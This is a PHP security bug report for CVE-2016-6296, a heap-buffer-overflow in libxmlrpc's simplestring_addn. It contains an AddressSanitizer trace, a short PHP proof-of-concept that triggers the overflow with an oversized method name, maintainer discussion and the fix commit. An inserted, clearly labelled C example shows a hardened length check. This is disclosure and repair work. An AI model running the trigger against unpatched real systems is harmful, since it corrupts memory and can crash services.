Sec Bug #72606 heap-buffer-overflow (write) simplestring_addn simplestring.c
Submitted: 2016-07-17 09:08 UTC Modified: 2016-07-25 15:21 UTC
From: pranjal dot jumde at gmail dot com Assigned: stas
Status: Closed Package: XMLRPC-EPI related
PHP Version: 5.5.37 OS: All
Private report: No CVE-ID: 2016-6296
 [2016-07-17 09:08 UTC] pranjal dot jumde at gmail dot com
Description:
------------
String length checks in simplestring_addn in simplestring.c use length as signed integers. This can be used by a malicious PHP script to cause an out-of-bounds write on the heap.

Tested on: git source https://github.com/php/php-src.git. Commit version: 735bec4f4018a4009a37d96489afe941c1ad711a compiled with address sanitizer.

Repro steps: Run the attached PHP script with an xmlrpc-enabled version of PHP.

$php poc.php 
=================================================================
==57127==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000bac0 at pc 0x00010a958bfe bp 0x7fff56c74b50 sp 0x7fff56c74310

WRITE of size 2147483581 at 0x60c00000bac0 thread T0

    #0 0x10a958bfd in __asan_memcpy (libclang_rt.asan_osx_dynamic.dylib+0x41bfd)
    #1 0x10995aeb5 in simplestring_addn simplestring.c:212
    #2 0x10996293d in simplestring_out_fptr xml_element.c:513
    #3 0x109962580 in xml_element_serialize xml_element.c:281
    #4 0x109962025 in xml_element_serialize xml_element.c:482
    #5 0x109961807 in xml_elem_serialize_to_string xml_element.c:542
    #6 0x109963cf9 in XMLRPC_REQUEST_ToXML xmlrpc.c:714
    #7 0x109951b37 in zif_xmlrpc_encode_request xmlrpc-epi-php.c:700
    #8 0x109d22727 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER zend_vm_execute.h:675
    #9 0x109c1ea04 in execute_ex zend_vm_execute.h:432
    #10 0x109c1f3d4 in zend_execute zend_vm_execute.h:474
    #11 0x109b1c4ab in zend_execute_scripts zend.c:1447
    #12 0x1099b241e in php_execute_script main.c:2533
    #13 0x109dee25d in do_cli php_cli.c:990
    #14 0x109dec029 in main php_cli.c:1378
    #15 0x7fffdf84d284 in start (libdyld.dylib+0x5284)
    #16 0x1  (<unknown module>)

0x60c00000bac0 is located 0 bytes to the right of 128-byte region [0x60c00000ba40,0x60c00000bac0)
allocated by thread T0 here:
    #0 0x10a961e07 in wrap_realloc (libclang_rt.asan_osx_dynamic.dylib+0x4ae07)
    #1 0x10995ae30 in simplestring_addn simplestring.c:205
    #2 0x10996293d in simplestring_out_fptr xml_element.c:513
    #3 0x109961b8d in xml_element_serialize xml_element.c:281
    #4 0x109962025 in xml_element_serialize xml_element.c:482
    #5 0x109961807 in xml_elem_serialize_to_string xml_element.c:542
    #6 0x109963cf9 in XMLRPC_REQUEST_ToXML xmlrpc.c:714
    #7 0x109951b37 in zif_xmlrpc_encode_request xmlrpc-epi-php.c:700
    #8 0x109d22727 in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER zend_vm_execute.h:675
    #9 0x109c1ea04 in execute_ex zend_vm_execute.h:432
    #10 0x109c1f3d4 in zend_execute zend_vm_execute.h:474
    #11 0x109b1c4ab in zend_execute_scripts zend.c:1447
    #12 0x1099b241e in php_execute_script main.c:2533
    #13 0x109dee25d in do_cli php_cli.c:990
    #14 0x109dec029 in main php_cli.c:1378
    #15 0x7fffdf84d284 in start (libdyld.dylib+0x5284)
    #16 0x1  (<unknown module>)

SUMMARY: AddressSanitizer: heap-buffer-overflow (libclang_rt.asan_osx_dynamic.dylib+0x41bfd) in __asan_memcpy
Shadow bytes around the buggy address:
==57127==ABORTING
Abort trap: 6



Test script:
---------------
<?php
ini_set('memory_limit', '2148M');
$max = 2147483582;

$name = '';
for ($i = 1; $i<$max; $i++) {
	$name .= 'a';
}

$request = xmlrpc_encode_request($name, "somevalue");
?>

Expected result:
----------------
No crash. Patch attached.
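A simplified model of the bug class the report describes, added here as an example and not code from the report, from PHP or from libxmlrpc: the length check done in signed int beside the same check in size_t with an explicit overflow guard, plus an append routine whose growth arithmetic cannot wrap. The sbuf type, the function names and the growth policy are assumptions; 2147483581 is the WRITE size from the ASan trace.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical model of the bug class in the report, not libxmlrpc's
 * simplestring code: a length check done in signed int beside the same
 * check in size_t with an overflow guard. */
/* Signed-style check: "do add more bytes fit behind len in size bytes?"
 * The sum is formed in uint32_t and reinterpreted (what int arithmetic
 * gives on two's-complement hardware, without UB). A wrapped sum "fits". */
bool fits_signed(int32_t len, int32_t size, int32_t add) {
    int32_t sum = (int32_t)((uint32_t)len + (uint32_t)add);
    return sum < size;
}

/* Hardened check: unsigned lengths and a guard against an unrepresentable sum. */
bool fits_unsigned(size_t len, size_t size, size_t add) {
    if (add > SIZE_MAX - len) return false;   /* sum would wrap */
    return len + add < size;                  /* bytes plus a NUL */
}

typedef struct { char *str; size_t len, size; } sbuf;

/* Append n bytes, growing with overflow-checked size_t arithmetic. */
bool sbuf_addn(sbuf *s, const char *p, size_t n) {
    if (n > SIZE_MAX - s->len - 1) return false;   /* len + n + 1 would wrap */
    size_t need = s->len + n + 1;
    if (need > s->size) {
        size_t nsize = s->size ? s->size : 64;
        while (nsize < need) nsize = (nsize > SIZE_MAX / 2) ? need : nsize * 2;
        char *q = realloc(s->str, nsize);
        if (!q) return false;
        s->str = q; s->size = nsize;
    }
    memcpy(s->str + s->len, p, n);
    s->len += n;
    s->str[s->len] = '\0';
    return true;
}

/* Two small appends succeed; an absurd one is refused before any realloc. */
size_t demo_append(void) {
    sbuf s = {0};
    bool ok = sbuf_addn(&s, "abc", 3) && sbuf_addn(&s, "def", 3);
    bool refused = !sbuf_addn(&s, "x", SIZE_MAX);
    size_t r = (ok && refused && strcmp(s.str, "abcdef") == 0) ? s.len : 0;
    free(s.str);
    return r;
}
```

With a 100-byte used length and a 128-byte buffer, the signed check accepts the trace's 2147483581-byte append because the sum wraps negative, while the size_t version rejects it.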

 [2016-07-17 20:27 UTC] stas@php.net
-Package: Reproducible crash +Package: XMLRPC-EPI related
 [2016-07-17 23:49 UTC] stas@php.net
This code seems to be part of libxmlrpc. It would make sense to report it to them; the homepage seems to be here: http://xmlrpc-epi.sourceforge.net/

While PHP can mitigate the issue, ultimately the package maintainers should take care of it.
 [2016-07-18 00:04 UTC] stas@php.net
Looking more into it, it's not easy to fix it outside of libxmlrpc, as everything is happening inside the library, and I'm not sure it's even maintained now.
 [2016-07-18 00:16 UTC] pranjal dot jumde at gmail dot com
Thanks Stanislav, did you get a chance to review the patch I uploaded for this issue? It was a band-aid fix, but I agree that the actual fix would be in the xml-rpc library.

From: http://gggeek.github.io/phpxmlrpc/

I think ggiunta at users.sourceforge.net would be the right person to comment. Could you add him to the CC list of this bug?
 [2016-07-18 00:46 UTC] stas@php.net
I'm sorry, I don't see any patches attached. Could you send it to stas@php.net or upload it to gist.github.com as a secret gist?
 [2016-07-18 18:03 UTC] pranjal dot jumde at gmail dot com
I mailed the patch to you; let me know if you have any questions about it.
 [2016-07-19 04:45 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2016-07-19 04:45 UTC] stas@php.net
Fix in security repo as e6c48213c22ed50b2b987b479fcc1ac709394caa and in https://gist.github.com/6eaf2bc74f9bc9db34cb4b10ed06b466
 [2016-07-19 04:46 UTC] stas@php.net
-PHP Version: 7.1.0alpha3 +PHP Version: 5.5.37
 [2016-07-19 06:33 UTC] pranjal dot jumde at gmail dot com
The patch looks good, thanks for the quick turnaround. Could you provide any details on the tentative release timeline?
 [2016-07-19 07:47 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e6c48213c22ed50b2b987b479fcc1ac709394caa
Log: Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c
 [2016-07-19 07:47 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-07-19 07:53 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e6c48213c22ed50b2b987b479fcc1ac709394caa
Log: Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c
 [2016-07-19 08:39 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e6c48213c22ed50b2b987b479fcc1ac709394caa
Log: Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c
 [2016-07-19 08:55 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e6c48213c22ed50b2b987b479fcc1ac709394caa
Log: Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c
 [2016-07-19 15:56 UTC] pranjal dot jumde at gmail dot com
Since this report is public now, could you please assign a CVE-ID to this bug?
 [2016-07-25 15:21 UTC] remi@php.net
-CVE-ID: +CVE-ID: 2016-6296
 [2016-10-17 10:11 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=e6c48213c22ed50b2b987b479fcc1ac709394caa
Log: Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c
 
Last updated: Wed Jun 28 19:01:44 2017 UTC